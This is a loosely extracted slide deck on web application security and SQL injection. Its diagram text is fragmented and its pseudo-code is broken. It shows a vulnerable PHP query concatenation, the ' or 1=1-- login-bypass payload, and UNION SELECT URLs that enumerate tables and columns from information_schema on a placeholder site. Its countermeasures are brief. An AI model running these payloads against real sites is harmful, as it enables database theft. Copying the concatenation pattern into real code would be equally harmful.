web app security part 1
DESCRIPTION
TRANSCRIPT
Web Application Security
By
Noah Franklin J
Session Flow
Copy Rights to Noah Franklin J
• What is Web Application Security?
• Security Misconceptions
• Reasons for Attacking Web Applications
• OWASP Top 10 Vulnerabilities
• Security guidelines
• Web Application Security checklist
Web Application Setup
Copy Rights to Noah Franklin J
Web Application Setup
Copy Rights to Noah Franklin J
Fire
wal
l
Hardened OS
Web Server
App ServerFi
rew
all
Dat
abas
es
Lega
cy S
yste
ms
We
b S
erv
ice
s
Dir
ect
ori
es
Hu
man
Re
srcs
Bill
ing
Custom Code
APPLICATIONATTACK
Net
wo
rk L
ayer
Ap
plic
atio
n L
ayer
Acc
ou
nts
Fin
ance
Ad
min
istr
atio
n
Tran
sact
ion
s
Co
mm
un
icat
ion
Kn
ow
led
ge M
gmt
E-C
om
me
rce
Bu
s. F
un
ctio
ns
Insider
Application Layer
• Attacker sends attacks inside valid HTTP requests
• Your custom code is tricked into doing something it should not
• Security requires software development expertise, not signatures
•Network Layer
• Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks inside HTTP requests.
• Security relies on signature databases
Reasons for Attacking Web Apps
Copy Rights to Noah Franklin J
Web Application threads
Copy Rights to Noah Franklin J
Web Application Threads
Copy Rights to Noah Franklin J
Web Application Working
Copy Rights to Noah Franklin J
3
Attacker sends data containing SQL fragments
Attacker enters SQL fragments into a web page that uses input in a query
1
Attacker views unauthorized data
Custom Code
Acc
ou
nts
Fin
ance
Ad
min
istr
atio
n
Tran
sact
ion
s
Co
mm
un
icat
ion
Kn
ow
led
ge M
gmt
E-C
om
me
rce
Bu
s. F
un
ctio
ns
Database
2 Application sends modified query to database, which executes it
EXAMPLE: $sql = "SELECT * FROM table WHERE id = '" . $_REQUEST['id’] . "’";
Fire
wal
l
Hardened OS
Web Server
App ServerFi
rew
all
Dat
abas
es
Lega
cy S
yste
ms
Web
Ser
vice
s
Dir
ecto
ries
Hu
man
Res
rcs
Bill
ing
Custom Code
APPLICATIONATTACK
Net
wo
rk L
ayer
Ap
plic
atio
n L
ayer
Acc
ou
nts
Fin
ance
Ad
min
istr
atio
n
Tran
sact
ion
s
Co
mm
un
icat
ion
Kn
ow
led
ge M
gmt
E-C
om
mer
ce
Bu
s. F
un
ctio
ns
HTTP
request
SQL
query
DB
Table
HTTP
response
“SELECT * FROM
accounts WHERE
acct=„‟ OR 1=1--
‟”
Account Summary
Acct:5424-6066-2134-
4334
Account:
SKU:
Account:
SKU:
1. Application presents a form to the attacker all via SSL
2. Attacker sends an attack in the form data
3. Application forwards attackto the database in a SQL query
4.Database runs querycontaining attack and sendsencrypted results back toapplication
5. Application decrypts data as normal and sends results to the user
Injection Flaw
Copy Rights to Noah Franklin J
What is SQL Injection?
Copy Rights to Noah Franklin J
Insertion of SQL statements into application inputs to corrupt, exploit, or otherwise damage an application database.
Most commonly done directly through web forms, but can be directed through URL hacking, request hacking using debugging tools, or using bots that emulate browsers and manipulate web requests.
What is a SQL Injection Attack?
Copy Rights to Noah Franklin J
Many web applications take user input from a form
A SQL injection attack involves placing SQL statements in the user input
SQL Basics
Copy Rights to Noah Franklin J
• Standard SQL commands such as
• "Select“ , "Insert“, "Update“, "Delete“, "Create",and "Drop" can be used to accomplish almosteverything that one needs to do with a database.
Types of SQL injection
Copy Rights to Noah Franklin J
• Direct injection Example – ‘ or 1=1– and true
conditions
• Indirect injection
Integer based
String based
Error based
Blind
Xml injection
Double string
Program Behind Login Page
Copy Rights to Noah Franklin J
if(username==franky) && (password==12345)
printf("Welcome to Email ");
else
{
printf("Invalid Username or password");
}
Program Behind Login Page
Copy Rights to Noah Franklin J
if(username== a‘ or 1=1--) && (password==a‘or 1=1-
-)
printf("Welcome to Email ");
else
{
printf("Invalid Username or password");
}
SQL Injection
Copy Rights to Noah Franklin J
SQL Basic Demo
SQL Injection Extracting Database
Copy Rights to Noah Franklin J
Example : www.site.com/index.php?id=1
Add ‘ or /* after id= 1 to check whether site is
vulnerable or not.
if site is giving some error/blank page then site is
vulnerable to SQL injection.
Copy Rights to Noah Franklin J
www.site.com/index.php?id=1+union+all+select+1,table_name,3,
,5,6,7+from+information_schema.tables
The above mentioned query gives names of tables stored in
database.
www.site.com/index.php?id=1+union+all+select+1,column_name
3,4,5,6,7+from+information_schema.columns+where+table_sche
a=char()
The above mentioned query gives names of tables stored in
database.
SQL Injection Extracting Database
Copy Rights to Noah Franklin J
www.site.com/index.php?id=1+union+all+select+1,table_name,3,
,5,6,7+from+information_schema.tables
The above mentioned query gives names of tables stored in
database.
www.site.com/index.php?id=1+union+all+select+1,column_name
3,4,5,6,7+from+information_schema.columns
The above mentioned query gives names of columns stored in
database.
SQL Injection Extracting Database
SQL Injection
Copy Rights to Noah Franklin J
SQL Demo
Countermeasure
Copy Rights to Noah Franklin J
• Check the input provided to database queries
• Validate and sanitize every user variable passed to
database